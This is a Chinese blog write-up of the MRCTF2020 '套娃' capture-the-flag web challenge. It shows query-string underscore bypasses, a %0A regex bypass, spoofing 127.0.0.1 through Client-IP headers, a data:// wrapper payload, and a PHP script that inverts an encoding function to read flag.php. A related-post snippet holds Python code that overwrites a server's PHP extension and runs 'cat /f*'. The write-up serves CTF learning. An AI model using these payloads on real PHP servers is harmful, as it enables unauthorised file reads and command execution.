[MRCTF2020]套娃 php字符串解析绕过,jsfuck编码

于 2024-08-07 12:07:44 发布
阅读量294 收藏 3
点赞数 7
分类专栏: CTF web题目 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73399382/article/details/140963289
版权

进来看到代码

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->

意思就是我们在url中?后面的东西不能出现下划线和它的url编码,第二个if不能强等于23333又要匹配到23333

字符串解析参考文章:

利用PHP的字符串解析特性Bypass - FreeBuf网络安全行业门户

经过尝试这两种可以绕过

b%20u%20p%20t=23333%0A    //%20为空格url编码,%0A为回车url编码
b%2eu%2ep%2et=23333%0A    //%2e为.

进去过后页面显示ip不对,下面随便用一个伪造127.0.0.1即可

X-Real-IP:

X-Client-IP:

X-Originating-IP:

出现一串jsfuck码,有两种解码方式

第一中F12打开控制台输入即可,如果有警告按提示输入即可解析

第二种去这个网站解析

CoderTab - JSUnFuck - Decode JSFuck Here

post方式传递参数出现源码

bp右键点击通过浏览器请求复制网址浏览器输入即可复制源码

源码:

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

代码解析:

change函数的主要功能是将参数$v进行base64解码,并对解码后的结果进行进一步的处理。具体来说,函数使用一个循环迭代字符串$v的每个字符。在每次迭代中,函数将字符转换为ASCII码,然后加上$i乘以2的结果,再将得到的新的ASCII码转换回字符,并将其拼接到一个结果字符串$re中。

最后,函数返回结果字符串$re

if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' )老办法伪造ip,然后利用data伪协议写入数据传给2333即可

我们要使$_GET['file'])的值为flag.php

把change函数逆向一下得到v值为

ZmpdYSZmXGI=

PHP脚本:

$str = '';
$re = 'flag.php';
for ($i=0;$i<strlen($re);$i++){
    $str .= chr ( ord ($re[$i]) - $i*2 );
}
$str = base64_encode($str);
echo "传入的v的值为:".$str;

改变请求方式进行传值,payload;

?2333=data://text/plain,todat%20is%20a%20happy%20day&file=ZmpdYSZmXGI

Client-IP: 127.0.0.1

孤丞OVO
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Matryoshka:PHP缓存库
05-09
俄罗斯套娃 Matryoshka是一个PHP缓存库,它围绕类的嵌套组件构建。 动机 PHP客户端库提供对较低级别的访问。 Matryoshka添加了便利功能,以简化客户端库未涵盖的常见操作。 大多数功能是由嵌套Backend提供的。 ...
围观tangram js库
01-19
Tangram官方网站。...围观社区:简易社区,直接使用tieba。反馈的信息不大多。按优点、不足、疑问、建议,分开来看。 优点:本土化与中国特色。caisonghai: tangram ...(JK:一直不明白,百度作过什么恶。)willstier:
[MRCTF2020]套娃
Sk1y的博客
07-20 2222
[MRCTF2020]套娃 考查知识点:本题三重套娃,考查的知识包括绕过过滤,空格代替_,传值方式,写代码的能力等等。 文章目录[MRCTF2020]套娃第一层套娃第二层套娃第三层套娃参考链接 第一层套娃 在f12中可以发现这个线索 <?php $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){//即不能存在_,这里用%5f url
利用PHP字符串解析特性绕过Waf
qq_45521281的博客
05-01 3885
PHP字符串解析特性 我们知道PHP将查询字符串(在URL或正文中)转换为内部关联数组$_GET或关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WA...
BUUCTF [MRCTF2020]套娃
qq_53863234的博客
12-04 592
php解析字符特性
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询
weixin_44016181的博客
10-12 250
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询,两道buuctf的练习题。python脚本实现比较简单,模板化python真的不要太爽~~
[MRCTF2020]三关套娃writeup
sGanYu
11-28 2939
考点 PHP解析字符串特性 PHP弱类型绕过 jother编码解码 Client-ip伪造ip data://伪协议 change函数 第一关 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE
一天一道ctf 第42天(php解析字符串特性)
scrawman的博客
07-23 370
[MRCTF2020]套娃 进去啥也没有,先看一下源码,发现第一关 $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_
BUUCTF--[MRCTF2020]套娃
二狗的博客
03-27 205
打开靶机:查看源码发现第一个if判断传参的字符串,不能有_和%5f绕过PHP会将传参中的空格( )、小数点(.)自动替换成下划线第二个if判断get传参b_u_p_t不等于23333 并且开头和结尾和中间必须是23333绕过:在23333结尾加个换行符url编码为%0a 即可绕过,发现进入得查看原码发现解码得随便用POST方法给Merak一个值发现代码1、来源ip是127.0.0.1 用2、get参数2333传来的值,使用文件流打开后内容为。
[MRCTF2020] - Web
qtL0ng的博客
07-01 1044
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
练[MRCTF2020]套娃
m0_66225311的博客
10-07 423
参数的`_`符号的替换,正则和强等于联合绕过,`jsfuck`编码,`bp`请求方式的转变,本地`ip`的请求头,代码审计,简单的字符串解密和加密函数之间的逆推构造,`file_get_contents`函数的绕过
俄罗斯套娃
04-17
"俄罗斯套娃"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套娃的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
别致的俄罗斯套娃广场.ppt
03-13
【标题】:“别致的俄罗斯套娃广场”实际上是指一个以俄罗斯传统工艺品——套娃为主题的广场,这可能是一个文化景点或者公共艺术空间。这个PPT可能是关于该广场的介绍或展示,包含了其设计特色、历史背景以及与套娃...
俄罗斯套娃奖品Java程序
08-12
5. **异常处理**:如果套娃的层次过深或有其他错误情况,程序可能需要捕获并处理异常,确保程序的健壮性。 6. **输入/输出**:如果程序需要用户交互或读取/保存套娃数据,那么会涉及Java的I/O流,如Scanner用于用户...
【中药网络药理学】筛选细胞衰老和预后相关基因(附分类代码和画图代码)
m0_53347750的博客
08-03 463
通过TCGA-LIHC数据集(2023年1月,n=377),下载clinical(临床信息),点击Metadata(样本信息),cart(基因文件)[/data/TCGA数据库]获取转录组测序数据与临床数据,并排除了临床数据不完整的患者队列。首先使用生存分析中的Cox比例风险模型建立一个风险评分系统,然后利用风险评分中位数对其进行分组,将其分为“高风险组”和”低风险组“,并绘制生存分析图(针对筛选出的基因)接下来,基于拟合多因素Cox回归和lasso回归,构建预后效果评价分类模型。
常见的CMS漏洞
C233333235的博客
08-03 492
通过⽇志⽂件拿Shell 利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改 这个存放位置,并且可以修改它的后缀名。查到数据库位置后,就可以大概猜测一下网站的根目录,一般www目录在phpstudt_pro下,是Extensions的同级目录。以确认我们的修改生效了,修改成功后,日志文件的后缀就被修改成了php,那么其中的php语句就会被运行。这样日志文件中就会有这个一句话木马的字样,我们去访问日志文件后,就可以进行连接获取shell。
[图解]SysML建模电磁轨道炮-01块定义图
最新发布
rolt的专栏
08-04 916
它这个轨道炮领域跟这两个Actor
深入探索:使用PHP开发保利威Polyv云点播服务器API对接实践(一)(点播服务器 API、视频加密、跑马灯防录屏、自定义用户)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
08-01 616
屏幕录像是最难防范的一种视频盗版方式,保利威播放器提供的防录屏跑马灯功能,通过设定文字内容(一般是观众的身份ID信息)在视频上不规则滚动,以此来警示盗版者,达到视频版权保护的效果。另外在用户网站中,除了通过登录信息(cookies)验证观众是否有权限访问视频播放页面外,还可以通过保利威播放器验证观众是否有播放某一个视频的权限,从而实现对观众权限的双重验证。保利威接口请求方式,包含post和get两种方式,因此,需要做好两种请求方式的封装函数。
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`php ext_skel.php --ext ctfshow --std`来生成该扩展的目录。 2. 进入生成的目录,并编辑.c文件,根据需要进行修改。 3. 执行以下命令来编译和安装扩展:`phpize ./configure make && make install`。编译完成后,会告知具体的扩展安装位置。 4. 通过发送POST请求,使用CTFSHOW套娃shell来写入并执行命令。示例代码如下: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'file': '/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so', 'content': open('ctfshow.so', 'rb').read()} requests.post(url + '?a=write', data=data) requests.get(url + '?a=run') ``` 5. 使用CTFSHOW套娃shell执行命令。可以使用以下命令示例: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'cmd': 'cat /f*'} requests.post(url + '?a=shell', data=data) ``` 这样,您就可以使用CTFSHOW套娃shell来执行命令并获取所需的结果了。请注意,使用套娃shell存在安全风险,应仅在合法和授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFSHOW 常用姿势篇(811-820)](https://blog.csdn.net/miuzzx/article/details/124038567)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值